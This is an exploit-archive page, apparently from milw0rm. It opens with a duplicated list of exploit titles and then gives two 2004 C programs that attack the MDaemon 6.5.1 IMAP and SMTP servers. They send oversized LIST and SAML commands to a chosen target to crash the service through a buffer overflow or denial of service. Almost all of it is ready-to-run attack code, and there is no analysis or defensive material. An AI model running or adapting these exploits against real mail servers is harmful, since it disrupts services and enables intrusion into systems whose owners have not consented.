
5 new exploits phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities My Book World Edition NAS Multiple Vulnerability My Book World Edition NAS - Multiple Vulnerabilities Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php) DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities New-CMS - Multiple Vulnerability New-CMS - Multiple Vulnerabilities Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities i-Gallery - Multiple Vulnerability i-Gallery - Multiple Vulnerabilities My Kazaam Notes Management System Multiple Vulnerability My Kazaam Notes Management System - Multiple Vulnerabilities Omnidocs - Multiple Vulnerability Omnidocs - Multiple Vulnerabilities Web Cookbook Multiple Vulnerability Web Cookbook - Multiple Vulnerabilities KikChat - (LFI/RCE) Multiple Vulnerability KikChat - (LFI/RCE) Multiple Vulnerabilities Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability xEpan 1.0.4 - Multiple Vulnerability xEpan 1.0.4 - Multiple Vulnerabilities AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow Cisco UCS Manager 2.1(1b) - Shellshock Exploit OpenSSH <= 7.2p1 - xauth Injection FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow
262 lines
6.1 KiB
C
Executable file
262 lines
6.1 KiB
C
Executable file
/////////////////////////////////////////////////////////////
|
|
// Remote proof-of-concept exploit //
|
|
// for //
|
|
// Mdaemon IMAP server v6.5.1 //
|
|
// and //
|
|
// possible other version. //
|
|
// Find bug: D_BuG. //
|
|
// Author: D_BuG. //
|
|
// D_BuG@bk.ru //
|
|
// Data: 16/09/2004 //
|
|
// NOT PUBLIC! //
|
|
// //
|
|
/////////////////////////////////////////////////////////////
|
|
|
|
#include <stdio.h>
|
|
#include <stdlib.h>
|
|
#include <sys/types.h>
|
|
#include <unistd.h>
|
|
#include <sys/socket.h>
|
|
#include <netinet/in.h>
|
|
|
|
int sock,err;
|
|
struct sockaddr_in sa;
|
|
|
|
|
|
int main (int argc, char *argv[])
|
|
|
|
{
|
|
|
|
printf("Remote proof-of-concept(buffer overflow) exploit\n");
|
|
printf(" for \n");
|
|
printf("Mdaemon IMAP server v6.5.1 and possible other version.\n");
|
|
if(argc!=3)
|
|
{
|
|
printf("Usage: %s <IPADDRESS> <PORT>\n",argv[0]);
|
|
printf("e.g.:%s 192.168.1.1 143\n",argv[0]);
|
|
exit(-1);
|
|
}
|
|
|
|
|
|
sa.sin_family=AF_INET;
|
|
sa.sin_port=htons(atoi(argv[2]));
|
|
if(inet_pton(AF_INET, argv[1], &sa.sin_addr) <= 0)
|
|
printf("Error inet_pton\n");
|
|
|
|
sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
|
|
|
|
printf("[~]Connecting...\n");
|
|
|
|
if(connect(sock,(struct sockaddr *)&sa,sizeof(sa)) <0)
|
|
{
|
|
printf("[-]Connect filed....\nExit...\n");
|
|
exit(-1);
|
|
}
|
|
|
|
|
|
char send[]="0001 LOGIN ""test"" ""console""\r\n";
|
|
char send3[]=
|
|
"007x LIST "
|
|
"""aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaAAAA"""
|
|
""" *BBBBBBBBBBaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaAaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAaaaAAAAAAAAAAAAAAAAAAAAAAAAAAAAc"""
|
|
"\r\n\r\n";
|
|
char rcv[1024];
|
|
|
|
|
|
printf("[+]Ok!\n");
|
|
sleep(2);
|
|
printf("[~]Get banner...\n");
|
|
if(read(sock,&rcv,sizeof(rcv)) !=-1){}
|
|
|
|
if(strstr(rcv,"IMAP")==NULL)
|
|
{
|
|
printf("[-]Failed!\n");
|
|
}
|
|
else
|
|
{
|
|
printf("[+]Ok!\n");
|
|
}
|
|
|
|
printf("[~]Send LOGIN and PASSWORD...\n");
|
|
write(sock,send,sizeof(send)-1);
|
|
sleep(2);
|
|
memset(rcv,0,1024);
|
|
if(read(sock,&rcv,sizeof(rcv)) !=-1){}
|
|
|
|
if(strstr(rcv,"OK")==NULL)
|
|
{
|
|
printf("[-]Failed login or password...\nExit...");
|
|
exit(-1);
|
|
}
|
|
|
|
printf("[+]Ok!\n");
|
|
|
|
printf("[~]Send LIST...\n");
|
|
write(sock,send3,sizeof(send3)-1);
|
|
sleep(2);
|
|
memset(rcv,0,1024);
|
|
if(read(sock,&rcv,sizeof(rcv)) !=-1){}
|
|
|
|
if(strstr(rcv,"BAD")!=NULL)
|
|
{
|
|
printf("[-]Exploit filed...please check your version Mdaemon!\n");
|
|
printf("[-]Exit...\n");
|
|
exit(-1);
|
|
}
|
|
printf("[+]Ok!\n");
|
|
printf("[+]Crash service.....\n");
|
|
printf("[~]Done.\n");
|
|
|
|
close(sock);
|
|
|
|
return 0;
|
|
|
|
}
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
mdaemon_rcpt.c
|
|
|
|
/////////////////////////////////////////////////////////////
|
|
// Remote DoS and proof-of-concept exploit //
|
|
// for //
|
|
// Mdaemon smtp server v6.5.1 //
|
|
// and //
|
|
// possible other version. //
|
|
// Find bug: D_BuG. //
|
|
// Author: D_BuG. //
|
|
// D_BuG@bk.ru //
|
|
// Data: 16/09/2004 //
|
|
// NOT PUBLIC! //
|
|
// Greets:Rasco. //
|
|
/////////////////////////////////////////////////////////////
|
|
|
|
#include <stdio.h>
|
|
#include <stdlib.h>
|
|
#include <sys/types.h>
|
|
#include <unistd.h>
|
|
#include <sys/socket.h>
|
|
#include <netinet/in.h>
|
|
|
|
int sock,err;
|
|
struct sockaddr_in sa;
|
|
|
|
|
|
int main (int argc, char *argv[])
|
|
|
|
{
|
|
|
|
printf("Remote DoS and proof-of-concept(buffer overflow) exploit\n");
|
|
printf(" for \n");
|
|
printf("Mdaemon smtp server v6.5.1 and possible other version.\n");
|
|
if(argc!=4)
|
|
{
|
|
printf("Usage: %s <IPADDRESS> <PORT> <TARGET>\n",argv[0]);
|
|
printf("Target:\n1.DoS.\n2.Proof-of-concept(buffer overflow).\n");
|
|
printf("e.g.:%s 192.168.1.1 25 1\n",argv[0]);
|
|
exit(-1);
|
|
}
|
|
|
|
|
|
sa.sin_family=AF_INET;
|
|
sa.sin_port=htons(atoi(argv[2]));
|
|
if(inet_pton(AF_INET, argv[1], &sa.sin_addr) <= 0)
|
|
printf("Error inet_pton\n");
|
|
|
|
sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
|
|
|
|
printf("[~]Connecting...\n");
|
|
|
|
if(connect(sock,(struct sockaddr *)&sa,sizeof(sa)) <0)
|
|
{
|
|
printf("[-]Connect filed....\nExit...\n");
|
|
exit(-1);
|
|
}
|
|
|
|
int len=247;
|
|
|
|
if(atoi(argv[3])==2)
|
|
{
|
|
len++;
|
|
}
|
|
|
|
char szBuffer[len+7];
|
|
char buff[len];
|
|
char send[]="EHLO tester\n";
|
|
char send3[]="RCPT TO postmaster\n";
|
|
char rcv[1024];
|
|
int i;
|
|
for(i=0;i<len;i++)
|
|
{
|
|
buff[i]=0x41;
|
|
}
|
|
|
|
sprintf(szBuffer,"SAML %s\n",buff);
|
|
|
|
printf("[+]Ok!\n");
|
|
sleep(2);
|
|
printf("[~]Get banner...\n");
|
|
if(read(sock,&rcv,sizeof(rcv)) !=-1){}
|
|
|
|
if(strstr(rcv,"220")==NULL)
|
|
{
|
|
printf("[-]Failed!\n");
|
|
}
|
|
else
|
|
{
|
|
printf("[+]Ok!\n");
|
|
}
|
|
|
|
printf("[~]Send EHLO...\n");
|
|
write(sock,send,sizeof(send)-1);
|
|
sleep(2);
|
|
memset(rcv,0,1024);
|
|
if(read(sock,&rcv,sizeof(rcv)) !=-1){}
|
|
|
|
if(strstr(rcv,"250")==NULL)
|
|
{
|
|
printf("[-]Failed...\n");
|
|
}
|
|
else
|
|
{
|
|
printf("[+]Ok!\n");
|
|
}
|
|
printf("[~]Send SAML...\n");
|
|
write(sock,szBuffer,strlen(szBuffer));//Send SAML
|
|
sleep(2);
|
|
memset(rcv,0,1024);
|
|
if(read(sock,&rcv,sizeof(rcv)) !=-1){}
|
|
|
|
if(strstr(rcv,"250")==NULL)
|
|
{
|
|
printf("[-]Exploit failed...please check your version Mdaemon!\n");
|
|
printf("[-]Exit...\n");
|
|
exit(-1);
|
|
}
|
|
printf("[+]Ok!\n");
|
|
|
|
printf("[~]Send RCPT...\n\n");
|
|
write(sock,send3,sizeof(send3)-1);//Send RCPT
|
|
sleep(2);
|
|
if(atoi(argv[3])==2)
|
|
{
|
|
printf("[+]Crash service.....\n");
|
|
}
|
|
else
|
|
{
|
|
printf("[+]DoS service.....\n");
|
|
}
|
|
printf("[~]Done.\n");
|
|
|
|
close(sock);
|
|
|
|
return 0;
|
|
|
|
}
|
|
|
|
// milw0rm.com [2004-09-22]
|